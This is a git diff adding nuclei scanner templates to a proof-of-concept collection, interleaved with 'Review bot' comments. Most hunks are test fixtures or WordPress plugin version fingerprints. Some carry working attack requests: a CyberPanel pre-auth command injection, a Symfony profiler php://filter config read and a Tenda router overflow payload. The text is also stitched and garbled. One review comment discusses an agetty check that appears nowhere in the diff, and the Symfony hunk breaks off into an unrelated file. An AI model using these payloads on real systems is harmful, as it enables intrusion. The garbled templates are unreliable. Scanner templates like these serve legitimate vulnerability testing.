+++ b/poc/other/ps1-snippet.yaml
@@ -0,0 +1,28 @@
+id: ps1-code-snippet
+
+info:
+ name: ps1-code-snippet
+ author: pdteam
+ severity: info
+ tags: code
+ description: |
+ ps1-code-snippet
+
+code:
+ - engine:
+ - powershell
+ - powershell.exe
+ args:
+ - -ExecutionPolicy
+ - Bypass
+ - -File
+ pattern: "*.ps1"
+ source: |
+ $stdin = [Console]::In
+ $line = $stdin.ReadLine()
+ Write-Host "hello from $line"
+
+ matchers:
+ - type: word
+ words:
+ - "hello from input"
\ No newline at end of file
diff --git a/poc/other/py-file.yaml b/poc/other/py-file.yaml
new file mode 100644
index 0000000000..3521ec902d
--- /dev/null
+++ b/poc/other/py-file.yaml
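Review bot: The second code block, `find /usr/sbin/agetty -perm /6000`, is redundant: `-perm /6000` matches a file with either the setuid or the setgid bit set, so every hit of the first `-perm /4000` check is also a hit here and the `or` condition gains nothing; keeping only the first block (and lowering `max-request` to match) gives the same result. If `code_1_response` also carries stderr, `find`'s "No such file or directory" message on a host without the binary contains the matched string `/usr/sbin/agetty` and would report a false positive; a `type: regex` matcher with `(?m)^/usr/sbin/agetty$` avoids that. The `description` text is also cut off mid-sentence at `high-privilege s>`.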
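Review bot: This template is a nuclei integration-test fixture (`author: pdteam`, matcher expecting the literal stdin value `hello from input`) rather than a proof of concept, so it can never match a scanned target and only adds noise when the `poc/` tree is loaded wholesale; the py-file, py-interactsh, py-nosig, py-snippet, raw-path-single-slash, raw-unsafe-path-single-slash, same-address, txt and unsigned hunks are the same kind of fixture. Several of them run `powershell.exe -ExecutionPolicy Bypass` or `python3` on the scanning host, which anyone enabling code-protocol templates over this corpus should know. Consider moving them out of `poc/` or adding `# nuclei test fixture, not a PoC` as the first line of each.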
@@ -0,0 +1,21 @@ +id: py-file + +info: + name: py-file + author: pdteam + severity: info + tags: code + description: | + py-file + +code: + - engine: + - py + - python3 + source: protocols/code/pyfile.py + + matchers: + - type: word + words: + - "hello from input" +# digest: 4b0a00483046022100afb5ebff14a40e7f9b679ffc4d93ce7849e33eb398ebb47f2e757cd24831f9dd02210089ffa21b2763e99ebce95dfc5b91e1e62da4ccdc9d2ad5c48584fa350ba335af:4a3eb6b4988d95847d4203be25ed1d46 \ No newline at end of file diff --git a/poc/other/py-interactsh.yaml b/poc/other/py-interactsh.yaml new file mode 100644 index 0000000000..0ccab7a7cd --- /dev/null +++ b/poc/other/py-interactsh.yaml @@ -0,0 +1,29 @@ +id: testcode + +info: + name: testcode + author: testcode + severity: info + tags: code + description: | + testcode + +variables: + i: "{{interactsh-url}}" + +code: + - engine: + - py + - python3 + # Simulate interactsh interaction + source: | + import os + from urllib.request import urlopen + urlopen("http://" + os.getenv('i')) + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" +# digest: 4b0a00483046022100939f83e74d43932a5bd792b1fd2c100eec2df60f2b2a8dd56b5c8ef5faa92b17022100f93031b0de373af7d78e623968ea5a2d67c4561ef70e3e6da15aef7e5c853115:4a3eb6b4988d95847d4203be25ed1d46 \ No newline at end of file diff --git a/poc/other/py-nosig.yaml b/poc/other/py-nosig.yaml new file mode 100644 index 0000000000..d8bd0ac6ac --- /dev/null +++ b/poc/other/py-nosig.yaml @@ -0,0 +1,21 @@ +id: py-nosig + +info: + name: py-nosig + author: pdteam + severity: info + tags: code + description: | + Python code without signature + +code: + - engine: + - py + - python3 + source: | + print("py unsigned code") + + matchers: + - type: word + words: + - "py unsigned code" \ No newline at end of file diff --git a/poc/other/py-snippet.yaml b/poc/other/py-snippet.yaml new file mode 100644 index 0000000000..067c183bb7 --- /dev/null +++ b/poc/other/py-snippet.yaml 
@@ -0,0 +1,23 @@ +id: py-code-snippet + +info: + name: py-code-snippet + author: pdteam + severity: info + tags: code + description: | + py-code-snippet + +code: + - engine: + - py + - python3 + source: | + import sys,os + print("hello from " + sys.stdin.read() + " " + os.getenv('baz')) + + matchers: + - type: word + words: + - "hello from input baz" +# digest: 4a0a0047304502203fe1d7d52bc2a41886d576a90c82c3be42078baaa4b46e1f3d8519665d6f88b202210081feb82c41150c5b218e226fc4f299ded19f42ba01ef34ba60b0634b4ea6ee12:4a3eb6b4988d95847d4203be25ed1d46 \ No newline at end of file diff --git a/poc/other/quivr-panel.yaml b/poc/other/quivr-panel.yaml new file mode 100644 index 0000000000..4e681786fd --- /dev/null +++ b/poc/other/quivr-panel.yaml @@ -0,0 +1,27 @@ +id: quivr-panel + +info: + name: Quivr Panel - Detect + author: s4e-io + severity: info + description: | + Quivr panel was discovered. + reference: + - https://github.com/QuivrHQ/quivr + metadata: + verified: true + max-request: 1 + fofa-query: icon_hash="848114197" + tags: panel,login,quivr,detect + +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers: + - type: dsl + dsl: + - 'contains_any(body, "Quivr - Get a Second Brain with Generative AI", "data-sentry-component=\"QuivrLogo\"")' + - 'status_code == 200' + condition: and diff --git a/poc/other/raw-path-single-slash.yaml b/poc/other/raw-path-single-slash.yaml new file mode 100644 index 0000000000..4ea491f4be --- /dev/null +++ b/poc/other/raw-path-single-slash.yaml @@ -0,0 +1,13 @@ +id: raw-path-single-slash + +info: + name: Test RAW HTTP Template with single slash + author: pdteam + severity: info + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} \ No newline at end of file diff --git a/poc/other/raw-unsafe-path-single-slash.yaml b/poc/other/raw-unsafe-path-single-slash.yaml new file mode 100644 index 0000000000..a356d18e80 --- /dev/null +++ b/poc/other/raw-unsafe-path-single-slash.yaml 
@@ -0,0 +1,15 @@
+id: raw-unsafe-path-single-slash
+
+info:
+ name: Test RAW Unsafe HTTP Template with single slash
+ author: pdteam
+ severity: info
+
+requests:
+ - raw:
+ - |+
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+
+ unsafe: true
\ No newline at end of file
diff --git a/poc/other/same-address.yaml b/poc/other/same-address.yaml
new file mode 100644
index 0000000000..5cad9d21fb
--- /dev/null
+++ b/poc/other/same-address.yaml
@@ -0,0 +1,29 @@
+id: same-target
+
+info:
+ name: same-target
+ author: pdteam
+ severity: info
+ description: Riak is a distributed NoSQL key-value data store that offers high availability, fault tolerance, operational simplicity, and scalability.
+
+network:
+ - host:
+ - "{{Hostname}}"
+ - "{{Hostname}}"
+ - "{{Hostname}}"
+ - "{{Hostname}}"
+ - "{{Hostname}}"
+ - "{{Hostname}}"
+ - "{{Hostname}}"
+ - "{{Hostname}}"
+ - "{{Hostname}}"
+ - "{{Hostname}}"
+ - "{{Hostname}}"
+ inputs:
+ - data: "PING\r\n"
+ read-size: 4
+ matchers:
+ - type: word
+ part: data
+ words:
+ - "PONG"
diff --git a/poc/other/seur-710adeba52f1b42ddecb78da2e1d3776.yaml b/poc/other/seur-710adeba52f1b42ddecb78da2e1d3776.yaml
new file mode 100644
index 0000000000..68dfc2f474
--- /dev/null
+++ b/poc/other/seur-710adeba52f1b42ddecb78da2e1d3776.yaml
@@ -0,0 +1,59 @@ +id: seur-710adeba52f1b42ddecb78da2e1d3776 + +info: + name: > + SEUR Oficial <= 2.2.11 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/88edf229-2be2-49d0-b500-e8ff7708f806?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/seur/" + google-query: inurl:"/wp-content/plugins/seur/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,seur,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/seur/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "seur" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.11') \ No newline at end of file diff --git a/poc/other/sf2-profiler-exploit.yaml b/poc/other/sf2-profiler-exploit.yaml new file mode 100644 index 0000000000..5494363ba6 --- /dev/null +++ b/poc/other/sf2-profiler-exploit.yaml 
@@ -0,0 +1,44 @@ +# UNIQUE ID +id: sf2-profiler-exploit + +# INFORMATION SECTION +info: + name: Symfony2 < 2.5.4 Profiler SQL Injection + author: rrandellusa + severity: High + description: This template detects the presence of the Symfony 2.5.4 Profiler toolbar, which can be exploited to expose sensitive information. + tags: symfony, SQL, injection + +# PROTOCOL SECTION +http: + - method: GET + path: + - "{{BaseURL}}/_profiler/" + - "{{BaseURL}}/_profiler/phpinfo" + - "{{BaseURL}}/_profiler/router" + - "{{BaseURL}}/_profiler/open?file=php://filter/convert.base64-encode/resource=config/services.yml" + + matchers-condition: or + matchers: + - type: word + words: + - "Symfony Profiler" + - "Profiler" + - "Symfony" + part: body + + - type: status + status: + - 200 + + - type: word + words: + - "
+ SW Kick Integration - Blocks and Shortcodes for Embedding Kick Streams <= 1.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via sw-kick-embed Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/077a31e7-de4b-418f-ac90-5c51a690bc65?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/streamweasels-kick-integration/" + google-query: inurl:"/wp-content/plugins/streamweasels-kick-integration/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,streamweasels-kick-integration,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/streamweasels-kick-integration/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "streamweasels-kick-integration" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.1') \ No newline at end of file diff --git a/poc/other/streamweasels-youtube-integration-49702b84305a29c70a813e1c6c4c5f8d.yaml b/poc/other/streamweasels-youtube-integration-49702b84305a29c70a813e1c6c4c5f8d.yaml new file mode 100644 index 0000000000..d4e97d7842 --- /dev/null +++ b/poc/other/streamweasels-youtube-integration-49702b84305a29c70a813e1c6c4c5f8d.yaml 
@@ -0,0 +1,59 @@ +id: streamweasels-youtube-integration-49702b84305a29c70a813e1c6c4c5f8d + +info: + name: > + StreamWeasels YouTube Integration <= 1.3.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via sw-youtube-embed Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/41f6b12e-49bb-4bee-bbde-ce4e5ebd4cad?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/streamweasels-youtube-integration/" + google-query: inurl:"/wp-content/plugins/streamweasels-youtube-integration/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,streamweasels-youtube-integration,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/streamweasels-youtube-integration/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "streamweasels-youtube-integration" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.2') \ No newline at end of file diff --git a/poc/other/tenda-fh451-stack-overflow.yaml b/poc/other/tenda-fh451-stack-overflow.yaml new file mode 100644 index 0000000000..b16875a0c2 --- /dev/null +++ b/poc/other/tenda-fh451-stack-overflow.yaml 
@@ -0,0 +1,36 @@
+id: tenda-fh451-stack-overflow
+
+info:
+ name: Tenda FH451 v1.0.0.9 - Stack Overflow
+ author: vidura2
+ severity: high
+ description: |
+ This template detects a stack overflow vulnerability in Tenda FH451 v1.0.0.9. The vulnerability exists in the RouteStatic function, allowing attackers to send overly long input data causing a buffer overflow, which could lead to remote code execution (RCE).
+ reference:
+ - https://github.com/BenJpopo/V/blob/main/Tenda/FH451/RouteStatic.md
+ tags: tenda,overflow,rce
+
+http:
+ - method: POST
+ path:
+ - "{{BaseURL}}/goform/setcfm"
+ body: |
+ funcname=save_list_data&funcpara1={{overflow_payload}}&funcpara2=aaaaaa
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+
+ payloads:
+ overflow_payload:
+ - "{{'a' * 0x500}}" # Overflow payload
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "error"
+ - "successful"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/other/txt.yaml b/poc/other/txt.yaml
new file mode 100644
index 0000000000..273a53ab7d
--- /dev/null
+++ b/poc/other/txt.yaml
@@ -0,0 +1,18 @@
+id: dns-txt-query-example
+
+info:
+ name: Test DNS TXT Query Template
+ author: pdteam
+ severity: info
+
+dns:
+ - name: "{{FQDN}}"
+ type: TXT
+ class: inet
+ recursion: true
+ retries: 3
+ matchers:
+ - type: word
+ part: all
+ words:
+ - "TXT"
diff --git a/poc/other/unquoted-service-pathcheck.yaml b/poc/other/unquoted-service-pathcheck.yaml
new file mode 100644
index 0000000000..e4258161b2
--- /dev/null
+++ b/poc/other/unquoted-service-pathcheck.yaml
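Review bot: The payload `{{'a' * 0x500}}` is Python syntax that nuclei's expression engine does not evaluate, so the request either carries the placeholder text or no oversized `funcpara1` at all; nuclei's `repeat` helper is the supported way to build it, e.g. `- "{{repeat('a', 1280)}}"`. The matcher is also weak evidence: a stack overflow in `RouteStatic` typically shows up as a crashed or unresponsive device, not as a 200 response whose body contains both `error` and `successful`, so the current `and` condition does not distinguish the overflow from an ordinary rejected request. Because the request can take the router down, the template should carry the `intrusive` tag and a `metadata.max-request` entry, as the cyberpanel-rce hunk in this patch does. The txt.yaml hunk that follows is a nuclei DNS test fixture rather than a PoC.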
@@ -0,0 +1,52 @@
+id: unquoted-service-pathcheck
+
+info:
+ name: Unquoted Service PathCheck
+ author: pussycat0x
+ severity: high
+ description: |
+ The Unquoted Service Path vulnerability in Windows occurs when services are installed using paths containing spaces without proper quotation marks. If attackers obtain write permissions in the service's installation directory, they can execute malicious code with elevated privileges.
+ tags: code,windows,privesc,ps
+
+self-contained: true
+code:
+ - engine:
+ - powershell
+ - powershell.exe
+
+ args:
+ - -ExecutionPolicy
+ - Bypass
+ - -File
+
+ pattern: "*.ps1"
+
+ source: |
+ Write-Host "Fetching the list of services, this may take a while...";
+
+ # Get the list of services that meet the criteria
+ $services = Get-WmiObject -Class Win32_Service |
+ Where-Object {
+ $_.PathName -inotmatch "`"" -and # Service path does not contain quotes
+ $_.PathName -inotmatch ":\\Windows\\" -and
+ ($_.StartMode -eq "Auto" -or $_.StartMode -eq "Manual") -and
+ ($_.State -eq "Running" -or $_.State -eq "Stopped")
+ };
+
+ # Check if any services meet the criteria
+ if ($($services | Measure-Object).Count -lt 1) {
+ Write-Host "No unquoted service paths were found.";
+ } else {
+ Write-Host "Unquoted service paths were found:";
+ foreach ($service in $services) {
+ Write-Host "Service Name: $($service.Name)";
+ Write-Host "Display Name: $($service.DisplayName)";
+ Write-Host "Path: $($service.PathName)";
+ Write-Host "----------------------------------";
+ }
+ }
+
+ extractors:
+ - type: dsl
+ dsl:
+ - response
diff --git a/poc/other/unsigned.yaml b/poc/other/unsigned.yaml
new file mode 100644
index 0000000000..7e483f0e8e
--- /dev/null
+++ b/poc/other/unsigned.yaml
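Review bot: The `Where-Object` filter never requires a space in the path, so an unquoted path without spaces (constructed example: `C:\Tools\agent.exe`) is reported although it cannot be hijacked; add `$_.PathName -match " " -and` next to the quote check. The template also has only a `dsl` extractor and no matcher, so nuclei emits a result for every host, including those whose output is `No unquoted service paths were found.`; a `type: word` matcher on `Unquoted service paths were found:` restricts results to real findings. `Get-WmiObject` is deprecated on current PowerShell; `Get-CimInstance -ClassName Win32_Service` exposes the same `PathName`, `StartMode` and `State` properties.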
@@ -0,0 +1,21 @@
+id: unsigned-code-snippet
+
+info:
+ name: unsigned-code-snippet
+ author: pdteam
+ severity: info
+ tags: code
+ description: |
+ unsigned-code-snippet
+
+code:
+ - engine:
+ - py
+ - python3
+ source: |
+ print("unsigned code")
+
+ matchers:
+ - type: word
+ words:
+ - "unsigned code"
\ No newline at end of file
diff --git a/poc/remote_code_execution/cyberpanel-rce.yaml b/poc/remote_code_execution/cyberpanel-rce.yaml
new file mode 100644
index 0000000000..7a257e1cf1
--- /dev/null
+++ b/poc/remote_code_execution/cyberpanel-rce.yaml
@@ -0,0 +1,58 @@
+id: cyberpanel-rce
+
+info:
+ name: CyberPanel v2.3.6 Pre-Auth Remote Code Execution
+ author: DhiyaneshDK
+ severity: critical
+ description: |
+ CyberPanel v2.3.6 has a critical vulnerability that allows remote attackers to execute arbitrary commands on the server without prior authentication.
+ impact: Attackers can exploit this vulnerability by crafting malicious requests that bypass authentication controls, allowing them to inject and execute arbitrary commands on the underlying server.
+ reference:
+ - https://community.cyberpanel.net/t/cyberpanel-2-1-remote-code-execution-rce/31760
+ - https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce
+ metadata:
+ verified: true
+ max-request: 2
+ shodan-query: html:"CyberPanel"
+ tags: cyberpanel,rce,intrusive
+
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ PUT /dataBases/upgrademysqlstatus HTTP/1.1
+ Host: {{Hostname}}
+ X-CSRFToken: {{csrftoken}}
+ Content-Type: application/json
+ Referer: {{RootURL}}
+ Cookie: csrftoken={{csrftoken}}
+
+ {"statusfile":"/dev/null; id; #","csrftoken":"{{csrftoken}}"}
+
+ extractors:
+ - type: regex
+ part: header
+ name: csrftoken
+ internal: true
+ group: 1
+ regex:
+ - csrftoken=([A-Za-z0-9]+)
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "uid="
+ - "error_message"
+ - "requestStatus"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/sql/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml b/poc/sql/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml
new file mode 100644
index 0000000000..8af931c002
--- /dev/null
+++ b/poc/sql/CVE-2024-10181-21fdb15695068521f367ac81bba91927.yaml
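Review bot: `flow: http(1) && http(2)` indexes entries of the `http` list, but this template has a single `http` entry holding both raw requests, so as I read nuclei's flow semantics `http(2)` refers to a block that does not exist; either remove the `flow` line (the two raws already run in order and `{{csrftoken}}` is carried across by the `internal: true` extractor) or split the raws into two `http` items. When the first response sets no `csrftoken` cookie the PUT is still sent with the literal `{{csrftoken}}`, which only produces a silent non-match; a comment on the extractor, `# csrftoken comes from the Set-Cookie header of GET /; the PUT is meaningless without it`, would save the next reader a debugging round. The references are a forum thread and a blog post; if a CVE identifier exists for this issue, add a `classification` block with `cve-id` so the template is reachable through `-tags cve`.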
@@ -0,0 +1,59 @@ +id: CVE-2024-10181-21fdb15695068521f367ac81bba91927 + +info: + name: > + Newsletters <= 4.9.9.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via newsletters_video Shortcode + author: topscoder + severity: low + description: > + The Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's newsletters_video shortcode in all versions up to, and including, 4.9.9.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/915c46f9-a342-4cc6-a726-2f1581a5d481?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10181 + metadata: + fofa-query: "wp-content/plugins/newsletters-lite/" + google-query: inurl:"/wp-content/plugins/newsletters-lite/" + shodan-query: 'vuln:CVE-2024-10181' + tags: cve,wordpress,wp-plugin,newsletters-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newsletters-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newsletters-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.9.9.4') \ No newline at end of file 
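Review bot: `severity: low` and the trailing `low` tag contradict the template's own `cvss-score: 6.4`, which is Medium on the CVSS 3.1 scale; nuclei's `-severity` filter keys off `severity`, so this template is hidden from a medium-and-up scan. The same mismatch is in the CVE-2024-10226, CVE-2024-10233, CVE-2024-9376 and CVE-2024-9505 hunks (all 6.4), CVE-2024-10360 (4.3, Medium) and CVE-2024-7985 (7.5, High, for an arbitrary file upload). Change this one to `severity: medium` and `tags: cve,wordpress,wp-plugin,newsletters-lite,medium`, and derive the value from the score in whatever generates these files. These templates are also filed under `poc/sql/` although none of them is a SQL injection, and each only fingerprints the version from readme.txt rather than exercising the flaw, which the `description` should say.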
diff --git a/poc/sql/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml b/poc/sql/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml new file mode 100644 index 0000000000..5f7009d3ef --- /dev/null +++ b/poc/sql/CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10226-352293729ca01a23dbb48ef5e92fcf29 + +info: + name: > + Arconix Shortcodes <= 2.1.13 - Authenticated (Contributor+) Stored Cross-Site Scripting via box Shortcode + author: topscoder + severity: low + description: > + The Arconix Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'box' shortcode in all versions up to, and including, 2.1.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/94bae97d-2959-4ace-992d-1f4b1ccc8c3b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10226 + metadata: + fofa-query: "wp-content/plugins/arconix-shortcodes/" + google-query: inurl:"/wp-content/plugins/arconix-shortcodes/" + shodan-query: 'vuln:CVE-2024-10226' + tags: cve,wordpress,wp-plugin,arconix-shortcodes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arconix-shortcodes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arconix-shortcodes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.13') \ No newline at end of file 
diff --git a/poc/sql/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml b/poc/sql/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml new file mode 100644 index 0000000000..55bed6d7bc --- /dev/null +++ b/poc/sql/CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10233-3e88623b9f3ddb06e9ba90e1e3bb7a8a + +info: + name: > + SMSAlert - WooCommerce <= 3.7.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via sa_subscribe Shortcode + author: topscoder + severity: low + description: > + The SMS Alert Order Notifications – WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sa_subscribe shortcode in all versions up to, and including, 3.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c923d1d6-04c6-4ea2-a69e-041fea1e280a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10233 + metadata: + fofa-query: "wp-content/plugins/sms-alert/" + google-query: inurl:"/wp-content/plugins/sms-alert/" + shodan-query: 'vuln:CVE-2024-10233' + tags: cve,wordpress,wp-plugin,sms-alert,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sms-alert/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sms-alert" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.5') \ No newline at end of file 
diff --git a/poc/sql/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml b/poc/sql/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml new file mode 100644 index 0000000000..368f26b40d --- /dev/null +++ b/poc/sql/CVE-2024-10360-45e78583db6193210a4d94e69731df68.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10360-45e78583db6193210a4d94e69731df68 + +info: + name: > + Move Addons for Elementor <= 1.3.5 - Authenticated (Contributor+) Sensitive Information Exposure via Elementor Templates + author: topscoder + severity: low + description: > + The Move Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.5 via the render function in includes/widgets/accordion/widget.php, includes/widgets/remote-template/widget.php, and other widget.php files. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/eafe73b4-b492-45c7-adca-d9a3042144b4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10360 + metadata: + fofa-query: "wp-content/plugins/move-addons/" + google-query: inurl:"/wp-content/plugins/move-addons/" + shodan-query: 'vuln:CVE-2024-10360' + tags: cve,wordpress,wp-plugin,move-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/move-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "move-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.5') \ No newline at end of file diff --git a/poc/sql/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml b/poc/sql/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml new file mode 100644 index 0000000000..a940612774 --- /dev/null 
+++ b/poc/sql/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937 + +info: + name: > + FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The FileOrganizer – Manage WordPress and Website Files plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the "fileorganizer_ajax_handler" function in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, and permissions granted by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: The FileOrganizer Pro plugin must be installed and active to allow Subscriber+ users to upload files. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f79164c2-be3b-496d-b747-3e4b60b7fc2b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.5 + cve-id: CVE-2024-7985 + metadata: + fofa-query: "wp-content/plugins/fileorganizer/" + google-query: inurl:"/wp-content/plugins/fileorganizer/" + shodan-query: 'vuln:CVE-2024-7985' + tags: cve,wordpress,wp-plugin,fileorganizer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fileorganizer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fileorganizer" 